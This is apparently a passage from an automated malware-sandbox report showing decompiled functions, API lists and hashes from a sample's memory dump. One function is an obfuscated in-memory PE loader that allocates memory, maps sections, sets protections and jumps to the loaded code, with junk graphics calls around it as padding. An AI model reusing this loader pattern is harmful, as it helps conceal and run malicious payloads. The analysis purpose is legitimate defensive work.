                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData), ref: 00432CDC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData), ref: 00432CEE
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground), ref: 00432D00
                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText), ref: 00432D12
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect), ref: 00432D24
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect), ref: 00432D36
                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize), ref: 00432D48
                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent), ref: 00432D5A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics), ref: 00432D6C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion), ref: 00432D7E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground), ref: 00432D90
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge), ref: 00432DA2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon), ref: 00432DB4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined), ref: 00432DC6
                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent), ref: 00432DD8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor), ref: 00432DEA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric), ref: 00432DFC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString), ref: 00432E0E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool), ref: 00432E20
                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt), ref: 00432E32
                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue), ref: 00432E44
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition), ref: 00432E56
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont), ref: 00432E68
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect), ref: 00432E7A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins), ref: 00432E8C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList), ref: 00432E9E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin), ref: 00432EB0
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme), ref: 00432EC2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename), ref: 00432ED4
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor), ref: 00432EE6
                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush), ref: 00432EF8
                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool), ref: 00432F0A
                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize), ref: 00432F1C
                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont), ref: 00432F2E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString), ref: 00432F40
                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt), ref: 00432F52
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive), ref: 00432F64
                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed), ref: 00432F76
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme), ref: 00432F88
                                  • GetProcAddress.KERNEL32(00000000,EnableTheming,00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture), ref: 00432F9A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                  • API String ID: 2238633743-2910565190
                                  • Opcode ID: 66cde5ce91dca340db7757e9f7d72edbfd72cbbfabcff38d2e0d347f9a2e3616
                                  • Instruction ID: ff41df598e27cbc5c4dff7cd951d28389819d8dd6eb5621b8254af16ca0a5ee4
                                  • Opcode Fuzzy Hash: 66cde5ce91dca340db7757e9f7d72edbfd72cbbfabcff38d2e0d347f9a2e3616
                                  • Instruction Fuzzy Hash: 89A16EF0A41660AFEF00EFA59CC6A2537F8EB097057111A7BB401DF296D67CA911CB2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F39C() {
                                  				struct HINSTANCE__* _v8;
                                  				intOrPtr _t46;
                                  				void* _t91;
                                  
                                  				_v8 = GetModuleHandleA("oleaut32.dll");
                                  				 *0x4bc7a4 = E0040F364("VariantChangeTypeEx", E0040EEE0, _t91);
                                  				 *0x4bc7a8 = E0040F364("VarNeg", E0040EF10, _t91);
                                  				 *0x4bc7ac = E0040F364("VarNot", E0040EF10, _t91);
                                  				 *0x4bc7b0 = E0040F364("VarAdd", E0040EF1C, _t91);
                                  				 *0x4bc7b4 = E0040F364("VarSub", E0040EF1C, _t91);
                                  				 *0x4bc7b8 = E0040F364("VarMul", E0040EF1C, _t91);
                                  				 *0x4bc7bc = E0040F364("VarDiv", E0040EF1C, _t91);
                                  				 *0x4bc7c0 = E0040F364("VarIdiv", E0040EF1C, _t91);
                                  				 *0x4bc7c4 = E0040F364("VarMod", E0040EF1C, _t91);
                                  				 *0x4bc7c8 = E0040F364("VarAnd", E0040EF1C, _t91);
                                  				 *0x4bc7cc = E0040F364("VarOr", E0040EF1C, _t91);
                                  				 *0x4bc7d0 = E0040F364("VarXor", E0040EF1C, _t91);
                                  				 *0x4bc7d4 = E0040F364("VarCmp", E0040EF28, _t91);
                                  				 *0x4bc7d8 = E0040F364("VarI4FromStr", E0040EF34, _t91);
                                  				 *0x4bc7dc = E0040F364("VarR4FromStr", E0040EFA0, _t91);
                                  				 *0x4bc7e0 = E0040F364("VarR8FromStr", E0040F00C, _t91);
                                  				 *0x4bc7e4 = E0040F364("VarDateFromStr", E0040F078, _t91);
                                  				 *0x4bc7e8 = E0040F364("VarCyFromStr", E0040F0E4, _t91);
                                  				 *0x4bc7ec = E0040F364("VarBoolFromStr", E0040F150, _t91);
                                  				 *0x4bc7f0 = E0040F364("VarBstrFromCy", E0040F1D0, _t91);
                                  				 *0x4bc7f4 = E0040F364("VarBstrFromDate", E0040F240, _t91);
                                  				_t46 = E0040F364("VarBstrFromBool", E0040F2B0, _t91);
                                  				 *0x4bc7f8 = _t46;
                                  				return _t46;
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F3A5
                                    • Part of subcall function 0040F364: GetProcAddress.KERNEL32(00000000), ref: 0040F382
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                  • API String ID: 1646373207-1918263038
                                  • Opcode ID: 2f6ce89c72387ef99e20cb6dce65cce0a9c5c1d8bd96b7ca947cdc72f2d537c5
                                  • Instruction ID: 1b8b95555d4afa8fd85e327777a07fd3c0e31aa0472b836f73436f88445f6105
                                  • Opcode Fuzzy Hash: 2f6ce89c72387ef99e20cb6dce65cce0a9c5c1d8bd96b7ca947cdc72f2d537c5
                                  • Instruction Fuzzy Hash: 984151619047066BD324AB7EB88142673D9E684B243A4C53FB804FBFD5DF3D6C498A2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E0049DA04(signed int __eax, void* __ebx, struct HDC__* __ecx, signed int __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				void* _v16;
                                  				intOrPtr _v48;
                                  				char _v52;
                                  				signed int _v60;
                                  				signed int _v64;
                                  				char _v68;
                                  				signed int _v76;
                                  				signed int _v84;
                                  				intOrPtr _v88;
                                  				void* _v92;
                                  				long _v96;
                                  				intOrPtr _v100;
                                  				long _v104;
                                  				signed int _t110;
                                  				signed int _t114;
                                  				void* _t115;
                                  				void* _t127;
                                  				signed int _t128;
                                  				signed int _t143;
                                  				intOrPtr _t157;
                                  				signed int _t205;
                                  				struct HDC__* _t206;
                                  				struct HDC__* _t209;
                                  				signed int _t212;
                                  				signed int _t213;
                                  				struct HDC__* _t216;
                                  				void* _t221;
                                  				intOrPtr _t234;
                                  				void* _t236;
                                  				signed int _t239;
                                  				void* _t242;
                                  				signed int _t247;
                                  				void* _t258;
                                  				intOrPtr _t260;
                                  				intOrPtr _t262;
                                  				signed int _t265;
                                  				void* _t268;
                                  				void* _t270;
                                  				void* _t271;
                                  				void* _t272;
                                  				void* _t275;
                                  				intOrPtr* _t276;
                                  
                                  				_t264 = __edi;
                                  				_t216 = __ecx;
                                  				_t274 = _t275;
                                  				_t276 = _t275 + 0xffffff8c;
                                  				_push(__edi);
                                  				_v60 = 0;
                                  				_v68 = 0;
                                  				_v64 = 0;
                                  				_v76 = __eax;
                                  				E00404888(_v76);
                                  				_t234 =  *0x49d770; // 0x49d774
                                  				E00404D74( &_v52, _t234);
                                  				_push(_t275);
                                  				_push(0x49dd45);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t276;
                                  				0;
                                  				0;
                                  				0;
                                  				if(0 == 0) {
                                  				}
                                  				_push(0x709e01de);
                                  				L00406DDC();
                                  				GetPolyFillMode(0x20);
                                  				_t110 = GetGraphicsMode(_t216);
                                  				if(_t216 != 0x49) {
                                  				}
                                  				_push(1);
                                  				_t205 = _t110;
                                  				GetGraphicsMode(0x73cab443);
                                  				_t114 = _v76;
                                  				_v84 = _t114;
                                  				_push(_t234 - 1);
                                  				_pop(_t236);
                                  				if(1 + _t216 * 0x340 != 0x3a) {
                                  					_t205 = _t205 ^ _t114;
                                  				}
                                  				_t115 = GetStockObject(1);
                                  				if((_t205 & 0x00000058) == 0) {
                                  				}
                                  				_t206 = _t115 + _t236;
                                  				GetBkColor(0xbd523a1);
                                  				GetPixelFormat(_t206);
                                  				_push(0);
                                  				_push(_v84);
                                  				asm("cdq");
                                  				asm("adc edx, [esp+0x4]");
                                  				_v8 =  *((intOrPtr*)(_v84 + 0x3c)) +  *_t276;
                                  				_t221 = _t236 + 0x18d;
                                  				GetPixelFormat(0x33);
                                  				_push(_t221);
                                  				_push(_t221);
                                  				_t127 = _t221;
                                  				_t128 = _t127 - 1;
                                  				_t239 = _t128;
                                  				_push(_t128 ^ _t239);
                                  				_pop(_t130);
                                  				_v16 = VirtualAlloc(0,  *(_v8 + 0x50), 0x2000, 1);
                                  				GetGraphicsMode(0x990da1f0);
                                  				if(_t206 != 0x24) {
                                  				}
                                  				_t242 = _t221 + 0x47;
                                  				if((GetROP2(GetGraphicsMode(0x7e1dc1a3)) - _t242 - 0x00000001 & 0x00000013) == 0) {
                                  					_t221 = _t221 - _t242;
                                  				}
                                  				GetROP2(0x81dfdaa5);
                                  				_t208 = 0x279;
                                  				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
                                  				_t143 = GetBkColor(0x46);
                                  				if(0x279 != 0x62) {
                                  					_t208 = 0x279 * _t143;
                                  				}
                                  				GetMapMode(0x5e);
                                  				if(_t221 != 0x54) {
                                  				}
                                  				_t247 =  *(_v8 + 0x14) & 0x0000ffff;
                                  				_v88 = _v8 + 0x18 + _t247;
                                  				GetGraphicsMode(1);
                                  				_push(_t208);
                                  				L00406DDC();
                                  				_t209 = _t208 ^ 0x000000ec;
                                  				GetMapMode(0x1f);
                                  				_push(4);
                                  				L00406DDC();
                                  				GetGraphicsMode(_t247 - 0x207);
                                  				_push(0x51);
                                  				GetBkColor(_t209);
                                  				_push(0x4a);
                                  				GetBkMode(_t209);
                                  				GetGraphicsMode(_t209);
                                  				_t268 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                  				if(_t268 >= 0) {
                                  					_t272 = _t268 + 1;
                                  					_t213 = 0;
                                  					do {
                                  						0;
                                  						0;
                                  						_t264 = _t213 + _t213 * 4;
                                  						_v96 =  *((intOrPtr*)(_v88 + 8 + _t264 * 8));
                                  						_v100 =  *((intOrPtr*)(_v88 + 0x10 + _t264 * 8));
                                  						_v92 = VirtualAlloc( *((intOrPtr*)(_v88 + 0xc + _t264 * 8)) + _v16, _v96, 0x1000, 4);
                                  						E00402D04( *((intOrPtr*)(_v88 + 0x14 + _t264 * 8)) + _v84, _v100, _v92);
                                  						_t213 = 1 + _t213;
                                  						_t272 = _t272 - 1;
                                  					} while (_t272 != 0);
                                  				}
                                  				_t157 = _v16;
                                  				_v48 =  *((intOrPtr*)(_v8 + 0x28)) + _t157;
                                  				_t255 =  *((intOrPtr*)(_v8 + 0xa0)) + _t157;
                                  				E0049D80C( *((intOrPtr*)(_v8 + 0xa0)) + _t157, _t274);
                                  				E0049D8A4( *((intOrPtr*)(_v8 + 0x80)) + _v16, _t209, _t264, _t268, _t274);
                                  				_t270 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                  				if(_t270 >= 0) {
                                  					_t271 = _t270 + 1;
                                  					_t212 = 0;
                                  					do {
                                  						_t265 = _t212 + _t212 * 4;
                                  						VirtualProtect( *((intOrPtr*)(_v88 + 0xc + _t265 * 8)) + _v16,  *(_v88 + 8 + _t265 * 8), E0049D790( *((intOrPtr*)(_v88 + 0x24 + _t265 * 8)), _t255),  &_v104);
                                  						_t212 = 1 + _t212;
                                  						_t271 = _t271 - 1;
                                  					} while (_t271 != 0);
                                  				}
                                  				GetMapMode(0x8ca2bcd6);
                                  				if((_t209 & 0x00000023) == 0) {
                                  				}
                                  				_t96 = _t209 + 0x264; // 0x4dd
                                  				GetTextAlign(0x56);
                                  				_t258 = _t96 - 1;
                                  				if(_t258 != 4) {
                                  				}
                                  				_v48(_v16, 1, 0, _t258);
                                  				_pop(_t260);
                                  				 *[fs:eax] = _t260;
                                  				_push(0x49dd4c);
                                  				E004043D8( &_v76);
                                  				E004043FC( &_v68, 3);
                                  				_t262 =  *0x49d770; // 0x49d774
                                  				return E00404E44( &_v52, _t262);
                                  			}

                                  APIs
                                  • GetDCPenColor.GDI32(709E01DE), ref: 0049DA5D
                                  • GetPolyFillMode.GDI32(00000020), ref: 0049DA64
                                  • GetGraphicsMode.GDI32 ref: 0049DA6A
                                  • GetGraphicsMode.GDI32(73CAB443), ref: 0049DA8C
                                  • GetStockObject.GDI32(00000001), ref: 0049DAA4
                                  • GetBkColor.GDI32(0BD523A1), ref: 0049DABF
                                  • GetPixelFormat.GDI32(00000001), ref: 0049DAC5
                                  • GetPixelFormat.GDI32(00000033), ref: 0049DAEE
                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,00000033), ref: 0049DB16
                                  • GetGraphicsMode.GDI32(990DA1F0), ref: 0049DB23
                                  • GetGraphicsMode.GDI32(7E1DC1A3), ref: 0049DB42
                                  • GetROP2.GDI32(00000000), ref: 0049DB48
                                  • GetROP2.GDI32(81DFDAA5), ref: 0049DB5E
                                  • GetBkColor.GDI32(00000046), ref: 0049DB7A
                                  • GetMapMode.GDI32(0000005E), ref: 0049DB89
                                  • GetGraphicsMode.GDI32(00000001), ref: 0049DBB5
                                  • GetDCPenColor.GDI32(00000279), ref: 0049DBBB
                                  • GetMapMode.GDI32(0000001F), ref: 0049DBC8
                                  • GetDCPenColor.GDI32(00000004), ref: 0049DBCF
                                  • GetGraphicsMode.GDI32 ref: 0049DBDB
                                  • GetBkColor.GDI32(00000279), ref: 0049DBE4
                                  • GetBkMode.GDI32(00000279), ref: 0049DBEE
                                  • GetGraphicsMode.GDI32(00000279), ref: 0049DBF4
                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000279,00000279,?,00000004,0000001F,00000279,00000001,00000046,81DFDAA5,7E1DC1A3,990DA1F0,00000000), ref: 0049DC41
                                  • VirtualProtect.KERNEL32(?,?,00000000,?,00000279,00000279,?,00000004,0000001F,00000279,00000001,00000046,81DFDAA5,7E1DC1A3,990DA1F0,00000000), ref: 0049DCCD
                                  • GetMapMode.GDI32(8CA2BCD6), ref: 0049DCDC
                                  • GetTextAlign.GDI32(00000056), ref: 0049DCF5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Mode$Graphics$Color$Virtual$AllocFormatPixel$AlignFillObjectPolyProtectStockText
                                  • String ID:
                                  • API String ID: 1942038030-0
                                  • Opcode ID: eba1f450fd32cf26634c80b6290451b881b0274a146affcd51cf818d1a6dc0e9
                                  • Instruction ID: 60df5bc7f1cd4416369ef0689efc58ff47d1a0fefa9d7d913ca24a9c08038def
                                  • Opcode Fuzzy Hash: eba1f450fd32cf26634c80b6290451b881b0274a146affcd51cf818d1a6dc0e9
                                  • Instruction Fuzzy Hash: 82A1A475A002049FEB14EBA9C8C5FAE77F8FF84704F11813AF501EB296D678AD158A58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00429A78(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                  				int _v8;
                                  				int _v12;
                                  				char _v13;
                                  				struct HDC__* _v20;
                                  				void* _v24;
                                  				void* _v28;
                                  				long _v32;
                                  				long _v36;
                                  				struct HPALETTE__* _v40;
                                  				intOrPtr* _t78;
                                  				struct HPALETTE__* _t89;
                                  				struct HPALETTE__* _t95;
                                  				int _t171;
                                  				intOrPtr _t178;
                                  				intOrPtr _t180;
                                  				struct HDC__* _t182;
                                  				int _t184;
                                  				void* _t186;
                                  				void* _t187;
                                  				intOrPtr _t188;
                                  
                                  				_t186 = _t187;
                                  				_t188 = _t187 + 0xffffffdc;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t182 = __eax;
                                  				_t184 = _a16;
                                  				_t171 = _a20;
                                  				_v13 = 1;
                                  				_t78 =  *0x4bb248; // 0x4a00c4
                                  				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
                                  					_v40 = 0;
                                  					_v20 = E004298D4(CreateCompatibleDC(0));
                                  					_push(_t186);
                                  					_push(0x429cf8);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t188;
                                  					_v24 = E004298D4(CreateCompatibleBitmap(_a32, _t171, _t184));
                                  					_v28 = SelectObject(_v20, _v24);
                                  					_t89 =  *0x4bc890; // 0xe4080bba
                                  					_v40 = SelectPalette(_a32, _t89, 0);
                                  					SelectPalette(_a32, _v40, 0);
                                  					if(_v40 == 0) {
                                  						_t95 =  *0x4bc890; // 0xe4080bba
                                  						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
                                  					} else {
                                  						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
                                  					}
                                  					RealizePalette(_v20);
                                  					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
                                  					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
